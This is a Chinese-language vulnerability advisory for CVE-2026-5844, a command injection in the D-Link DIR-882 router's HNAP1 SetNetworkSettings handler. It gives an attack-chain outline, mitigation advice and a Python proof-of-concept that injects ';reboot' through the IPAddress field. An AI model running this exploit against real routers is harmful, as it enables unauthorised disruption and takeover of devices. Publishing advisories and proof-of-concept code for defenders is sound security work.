CVE-2026-5844 CVSS 7.2 高危

CVE-2026-5844 D-Link DIR-882 远程命令注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5844

漏洞类型

操作系统命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-882

漏洞概述

D-Link DIR-882路由器固件1.01B02版本中存在操作系统命令注入漏洞。该漏洞源于HNAP1接口的SetNetworkSettings处理程序对输入参数过滤不当。攻击者可远程构造恶意请求，通过操纵IPAddress参数触发prog.cgi中的sprintf函数漏洞，进而执行任意系统命令，导致设备完全被控。

技术细节

该漏洞位于D-Link DIR-882路由器的`prog.cgi`文件中，涉及HNAP1（Home Network Administration Protocol）协议的`SetNetworkSettings`处理函数。由于代码在处理网络设置请求时使用了不安全的`sprintf`函数，直接将用户提交的`IPAddress`参数格式化到系统命令字符串中，且未对特殊字符进行过滤。攻击者只需具备高权限（如登录凭证），即可发送特制的SOAP/XML POST请求。当服务端解析并执行该请求时，注入的恶意Shell命令将随合法系统指令一同被执行。由于CVSS向量显示攻击复杂度低且无需用户交互，该漏洞具有极高的利用价值。

攻击链分析

STEP 1

侦查

攻击者扫描网络，识别目标为D-Link DIR-882路由器，并确认其固件版本为1.01B02。

STEP 2

访问与认证

攻击者通过暴力破解或利用已知凭证获取路由器的管理员权限（PR:H要求）。

STEP 3

漏洞利用

攻击者向/HNAP1接口发送特制的POST请求，在SetNetworkSettings的IPAddress参数中注入恶意OS命令。

STEP 4

命令执行

服务器端prog.cgi通过sprintf处理输入时执行注入的命令，攻击者获得系统Shell权限。

STEP 5

持久化与控制

攻击者修改系统配置、植入后门或窃取数据，完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://192.168.0.1/HNAP1/"

# Malicious payload to inject command (e.g., ping a test server)
# The payload targets the IPAddress parameter in SetNetworkSettings
payload = ";reboot"

# Construct the HNAP1 SOAP request body
soap_body = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetNetworkSettings xmlns="http://purenetworks.com/HNAP1/">
      <IPAddress>{payload}</IPAddress>
    </SetNetworkSettings>
  </soap:Body>
</soap:Envelope>'''

headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "http://purenetworks.com/HNAP1/SetNetworkSettings"
}

try:
    # Send the request
    response = requests.post(target_url, data=soap_body, headers=headers, timeout=5)
    print(f"Status Code: {response.status_code}")
    print("Response Body:")
    print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

D-Link DIR-882 1.01B02

防御指南

临时缓解措施

鉴于厂商已停止对该产品的支持，无法通过官方固件更新修复此漏洞。建议用户立即采取以下缓解措施：首先，在路由器设置中关闭远程管理（Remote Management）功能；其次，修改默认管理员密码并使用强密码；再次，利用网络防火墙限制对路由器内部IP（如192.168.0.1）的HTTP/HTTPS访问；最后，强烈建议更换为仍在维护期内的现代路由器产品。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5844
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5844
3 Details https://www.cvedetails.com/cve/CVE-2026-5844/
4 VulDB https://vuldb.com/cve/CVE-2026-5844
5 Link https://files.catbox.moe/ei31k1.zip
6 Link https://vuldb.com/submit/790290
7 Link https://vuldb.com/vuln/356329
8 Link https://vuldb.com/vuln/356329/cti
9 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表